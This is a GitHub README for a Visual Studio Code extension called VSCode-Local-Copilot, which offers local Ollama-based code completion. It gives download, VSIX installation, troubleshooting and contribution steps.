Skip to content

Cadentrex/VSCode-Local-Copilot

🎉 VSCode-Local-Copilot - Enhance Your Coding Experience Effortlessly

🚀 Getting Started

Welcome to VSCode-Local-Copilot! This tool brings enhanced coding support right to your fingertips in Visual Studio Code. With it, you'll enjoy GitHub Copilot-like capabilities using local Ollama models. Let's get you started!

📥 Download & Install

To download the latest version of VSCode-Local-Copilot, visit this page:

Download from Releases

On the Releases page, follow these steps to get your extension:

  1. Find the latest release at the top.
  2. Click on the release title to see the details.
  3. Locate the version suited for your system.
  4. Click the correct file name to download it.

System Requirements

  • OS: Windows 10 or later, macOS Mojave or later, or a recent version of Linux.
  • VS Code version: 1.50 or newer.
  • Memory: At least 4 GB of RAM.
  • Storage: 200 MB of free disk space.

🛠️ Setup Instructions

Once the download is complete, follow these steps to install and run VSCode-Local-Copilot:

  1. Locate the downloaded file:

    • For Windows, it will be in your Downloads folder as a .zip file.
    • For macOS, it may be in the Downloads folder with the .zip format.
    • For Linux, find the file in your Downloads directory.
  2. Extract the files:

    • On Windows, right-click the .zip file and select "Extract All".
    • On macOS, double-click the .zip file.
    • On Linux, right-click and select "Extract Here".
  3. Install the extension in Visual Studio Code:

    • Open Visual Studio Code.
    • Click on the Extensions icon on the sidebar (or press Ctrl + Shift + X).
    • Click on the three dots at the top-right corner and choose "Install from VSIX...".
    • Browse to the extracted folder and select the VSIX file.
    • Hit "Open" to begin installation.
  4. Enable local models:

    • After installation, open the command palette by pressing Ctrl + Shift + P.
    • Type "Local Copilot" and select "Enable Local Models".
  5. Start coding:

    • Create a new file or open an existing one.
    • Start typing, and you will see suggestions pop up!

🎓 How It Works

VSCode-Local-Copilot leverages the powerful Ollama models running locally on your machine. This means faster response times for code suggestions without any need for internet access. Enjoy a seamless development experience with smart completions based on your coding patterns and styles.

🔍 Features

  • Local Model Usage: No internet required for data processing.
  • Smart Suggestions: Receive code completions tailored to your work.
  • Multi-language Support: Works well with various programming languages, enhancing your workflow.
  • Easy Integration: Simple setup process to get started right away.
  • Regular Updates: Stay tuned for new features and improvements.

🛠️ Troubleshooting

If you encounter issues, please consider the following troubleshooting tips:

  • Extension Not Visible: Ensure you have installed the extension correctly via the command palette.
  • Slow Performance: Check system resources to ensure adequate RAM is available.
  • Suggestions Not Appearing: Restart Visual Studio Code, and make sure local model features are enabled.

🗣️ Get Help

For support, please open an issue on the GitHub repository, or refer to the FAQ section. Your feedback and questions are welcome!

💬 Contributing

If you'd like to contribute to VSCode-Local-Copilot, please follow these guidelines:

  1. Fork the repository.
  2. Create a new branch for your feature or fix.
  3. Make your changes and commit them.
  4. Push the branch back to your fork.
  5. Submit a pull request detailing your changes.

📜 License

VSCode-Local-Copilot is open-source software licensed under the MIT License. You may use, modify, and distribute the code as you wish.

📜 Acknowledgments

  • Thanks to the creators of the Ollama model for their exceptional work in machine learning and AI.
  • A big thank you to the Visual Studio Code community for their continued support and contributions.

Remember, you can always download VSCode-Local-Copilot from this page:

Download from Releases